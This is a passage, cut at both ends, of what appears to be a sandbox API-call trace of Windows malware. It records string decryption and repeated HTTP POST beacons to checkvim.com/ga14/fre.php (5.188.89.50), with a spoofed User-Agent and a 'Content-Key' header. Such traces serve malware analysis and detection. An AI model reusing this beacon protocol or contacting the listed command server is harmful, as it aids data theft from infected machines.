returned 0x870228 [0317.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0317.916] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0317.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0317.918] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0317.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0317.928] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0317.929] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0317.929] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0317.929] GetProcessHeap () returned 0x840000 [0317.929] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0317.929] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0317.929] GetProcessHeap () returned 0x840000 [0317.929] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0317.929] GetProcessHeap () returned 0x840000 [0317.929] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0317.929] GetProcessHeap () returned 0x840000 [0317.929] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0317.930] GetProcessHeap () returned 0x840000 [0317.930] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb00 [0317.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.931] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0317.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.947] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0317.957] GetProcessHeap () returned 0x840000 [0317.957] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0317.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.959] CryptImportKey (in: hProv=0x86f710, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9f0) returned 1 [0317.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.960] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0317.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.961] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.961] GetProcessHeap () returned 0x840000 [0317.961] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0317.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.962] CryptDecrypt (in: hKey=0x87e9f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb00, pdwDataLen=0x19f9a4 | out: pbData=0x87fb00, pdwDataLen=0x19f9a4) returned 1 [0317.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.963] CryptDestroyKey (hKey=0x87e9f0) returned 1 [0317.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0317.965] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0317.965] GetProcessHeap () returned 0x840000 [0317.965] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0317.965] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0317.966] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0318.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0318.007] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0318.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0318.009] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0318.009] GetProcessHeap () returned 0x840000 [0318.009] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0318.009] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871240*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0318.011] GetProcessHeap () returned 0x840000 [0318.011] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bc8 [0318.011] socket (af=2, type=1, protocol=6) returned 0x560 [0318.011] connect (s=0x560, name=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0318.087] FreeAddrInfoW (pAddrInfo=0x871240*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0318.087] GetProcessHeap () returned 0x840000 [0318.087] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f798 [0318.087] GetProcessHeap () returned 0x840000 [0318.087] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0318.088] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0318.088] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0318.089] GetProcessHeap () returned 0x840000 [0318.089] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0318.089] GetProcessHeap () returned 0x840000 [0318.089] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0318.089] GetProcessHeap () returned 0x840000 [0318.089] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb90 [0318.089] GetProcessHeap () returned 0x840000 [0318.089] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0318.090] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0318.091] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0318.091] GetProcessHeap () returned 0x840000 [0318.091] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0318.091] GetProcessHeap () returned 0x840000 [0318.091] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0318.091] send (s=0x560, buf=0x873a58*, len=237, flags=0) returned 237 [0318.092] send (s=0x560, buf=0x87eb58*, len=159, flags=0) returned 159 [0318.092] GetProcessHeap () returned 0x840000 [0318.092] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0318.092] recv (in: s=0x560, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0318.475] GetProcessHeap () returned 0x840000 [0318.475] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0318.475] GetProcessHeap () returned 0x840000 [0318.475] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0318.475] GetProcessHeap () returned 0x840000 [0318.475] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0318.475] GetProcessHeap () returned 0x840000 [0318.475] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f798 | out: hHeap=0x840000) returned 1 [0318.475] closesocket (s=0x560) returned 0 [0318.476] GetProcessHeap () returned 0x840000 [0318.476] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bc8 | out: hHeap=0x840000) returned 1 [0318.476] GetProcessHeap () returned 0x840000 [0318.476] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0318.476] GetProcessHeap () returned 0x840000 [0318.476] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0318.476] GetProcessHeap () returned 0x840000 [0318.476] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0318.476] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xb14) returned 0x560 [0318.478] Sleep (dwMilliseconds=0xea60) [0318.480] GetProcessHeap () returned 0x840000 [0318.480] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f878 [0318.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.481] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0318.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.488] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0318.495] GetProcessHeap () returned 0x840000 [0318.495] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0318.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.496] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e730) returned 1 [0318.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.497] CryptSetKeyParam (hKey=0x87e730, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0318.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.499] CryptSetKeyParam (hKey=0x87e730, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.499] GetProcessHeap () returned 0x840000 [0318.499] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0318.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.500] CryptDecrypt (in: hKey=0x87e730, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f878, pdwDataLen=0x19f9a4 | out: pbData=0x87f878, pdwDataLen=0x19f9a4) returned 1 [0318.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.512] CryptDestroyKey (hKey=0x87e730) returned 1 [0318.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.514] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0318.514] GetProcessHeap () returned 0x840000 [0318.514] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0318.515] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0318.515] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0318.516] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0318.516] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0318.517] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0318.517] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0318.518] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0318.518] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0318.518] GetProcessHeap () returned 0x840000 [0318.519] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0318.519] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0318.519] GetProcessHeap () returned 0x840000 [0318.519] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0318.519] GetProcessHeap () returned 0x840000 [0318.523] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0318.523] GetProcessHeap () returned 0x840000 [0318.523] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f878 | out: hHeap=0x840000) returned 1 [0318.523] GetProcessHeap () returned 0x840000 [0318.523] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7a0 [0318.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.524] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0318.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.529] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fdf8) returned 1 [0318.537] GetProcessHeap () returned 0x840000 [0318.537] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0318.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.538] CryptImportKey (in: hProv=0x86fdf8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0318.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.539] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0318.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.541] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.541] GetProcessHeap () returned 0x840000 [0318.541] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0318.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.542] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0318.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.543] CryptDestroyKey (hKey=0x87e330) returned 1 [0318.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.544] CryptReleaseContext (hProv=0x86fdf8, dwFlags=0x0) returned 1 [0318.545] GetProcessHeap () returned 0x840000 [0318.545] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0318.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0318.546] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0318.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0318.548] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0318.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0318.549] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0318.549] GetProcessHeap () returned 0x840000 [0318.549] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871240 [0318.549] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0318.551] GetProcessHeap () returned 0x840000 [0318.551] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bb8 [0318.551] socket (af=2, type=1, protocol=6) returned 0x564 [0318.551] connect (s=0x564, name=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0318.618] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0318.618] GetProcessHeap () returned 0x840000 [0318.618] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fb50 [0318.618] GetProcessHeap () returned 0x840000 [0318.618] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0318.619] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0318.620] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0318.620] GetProcessHeap () returned 0x840000 [0318.620] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0318.620] GetProcessHeap () returned 0x840000 [0318.620] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0318.620] GetProcessHeap () returned 0x840000 [0318.620] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f758 [0318.620] GetProcessHeap () returned 0x840000 [0318.620] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0318.621] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0318.622] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0318.622] GetProcessHeap () returned 0x840000 [0318.622] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0318.622] GetProcessHeap () returned 0x840000 [0318.622] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0318.622] send (s=0x564, buf=0x873a58*, len=237, flags=0) returned 237 [0318.623] send (s=0x564, buf=0x87eb58*, len=159, flags=0) returned 159 [0318.623] GetProcessHeap () returned 0x840000 [0318.623] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0318.623] recv (in: s=0x564, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0318.977] GetProcessHeap () returned 0x840000 [0318.977] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0318.977] GetProcessHeap () returned 0x840000 [0318.977] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0318.977] GetProcessHeap () returned 0x840000 [0318.977] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0318.977] GetProcessHeap () returned 0x840000 [0318.977] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fb50 | out: hHeap=0x840000) returned 1 [0318.977] closesocket (s=0x564) returned 0 [0318.978] GetProcessHeap () returned 0x840000 [0318.978] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bb8 | out: hHeap=0x840000) returned 1 [0318.978] GetProcessHeap () returned 0x840000 [0318.978] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0318.978] GetProcessHeap () returned 0x840000 [0318.978] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0318.978] GetProcessHeap () returned 0x840000 [0318.978] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871240 | out: hHeap=0x840000) returned 1 [0318.978] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xb60) returned 0x564 [0318.980] Sleep (dwMilliseconds=0xea60) [0318.982] GetProcessHeap () returned 0x840000 [0318.982] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0318.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.983] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0318.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0318.999] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fdf8) returned 1 [0319.029] GetProcessHeap () returned 0x840000 [0319.029] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0319.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.031] CryptImportKey (in: hProv=0x86fdf8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e430) returned 1 [0319.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.032] CryptSetKeyParam (hKey=0x87e430, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0319.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.033] CryptSetKeyParam (hKey=0x87e430, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.033] GetProcessHeap () returned 0x840000 [0319.033] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0319.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.034] CryptDecrypt (in: hKey=0x87e430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0319.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.036] CryptDestroyKey (hKey=0x87e430) returned 1 [0319.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.039] CryptReleaseContext (hProv=0x86fdf8, dwFlags=0x0) returned 1 [0319.040] GetProcessHeap () returned 0x840000 [0319.040] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0319.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.041] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0319.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.042] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0319.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.043] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0319.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.044] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0319.044] GetProcessHeap () returned 0x840000 [0319.044] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0319.044] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, 